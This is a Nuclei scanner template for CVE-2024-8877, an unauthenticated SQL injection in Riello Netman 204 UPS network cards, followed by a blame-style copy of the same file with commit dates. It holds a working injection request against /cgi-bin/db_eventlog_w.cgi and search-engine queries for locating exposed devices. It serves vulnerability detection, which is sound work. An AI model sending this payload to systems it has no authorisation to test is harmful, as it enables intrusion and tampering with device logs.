nuclei-templates/http/cves/2024/CVE-2024-8877.yaml

id: CVE-2024-8877

info:
  name: Riello Netman 204 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.
  reference:
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html
    - https://0day.today/exploit/39757
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8877
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8877
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39654
    cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: riello-ups
    product: netman_204_firmware
    shodan-query: title:"netman 204"
    fofa-query: title="netman 204"
    censys-query: services.http.response.body:"netman204"
    google-query: intitle:"netman 204"
  tags: cve,cve2024,netman,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502204458db1ba5309cd954ea72f415abcc44c61208a52ca872f4a507f58768b0dc99022100e98ad16fa2d74810ec1adddab09484abdb1471deb7db3fd848612b4d351dfd7c:922c64590222798bb761d5b6d8e72950
add CVE-2024-8877 2024-10-04 08:48:34 +00:00			`id: CVE-2024-8877`

			`info:`
			`name: Riello Netman 204 - SQL Injection`
			`author: s4e-io`
			`severity: critical`
			`description: \|`
			`The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.`
			`reference:`
			`- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html`
			`- https://0day.today/exploit/39757`
updated matchers 2024-10-04 11:33:07 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-8877`
add CVE-2024-8877 2024-10-04 08:48:34 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2024-8877`
			`cwe-id: CWE-89`
			`epss-score: 0.00091`
			`epss-percentile: 0.39654`
			`cpe: cpe:2.3:o:riello-ups:netman_204_firmware::::::::`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: riello-ups`
			`product: netman_204_firmware`
updated matchers 2024-10-04 11:33:07 +00:00			`shodan-query: title:"netman 204"`
			`fofa-query: title="netman 204"`
add CVE-2024-8877 2024-10-04 08:48:34 +00:00			`censys-query: services.http.response.body:"netman204"`
updated matchers 2024-10-04 11:33:07 +00:00			`google-query: intitle:"netman 204"`
add CVE-2024-8877 2024-10-04 08:48:34 +00:00			`tags: cve,cve2024,netman,sqli`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"`

			`matchers:`
			`- type: dsl`
			`dsl:`
updated matchers 2024-10-04 11:33:07 +00:00			`- 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'`
add CVE-2024-8877 2024-10-04 08:48:34 +00:00			`- 'status_code == 200'`
			`condition: and`
chore: sign templates 🤖 2024-10-04 11:44:54 +00:00			`# digest: 4a0a0047304502204458db1ba5309cd954ea72f415abcc44c61208a52ca872f4a507f58768b0dc99022100e98ad16fa2d74810ec1adddab09484abdb1471deb7db3fd848612b4d351dfd7c:922c64590222798bb761d5b6d8e72950`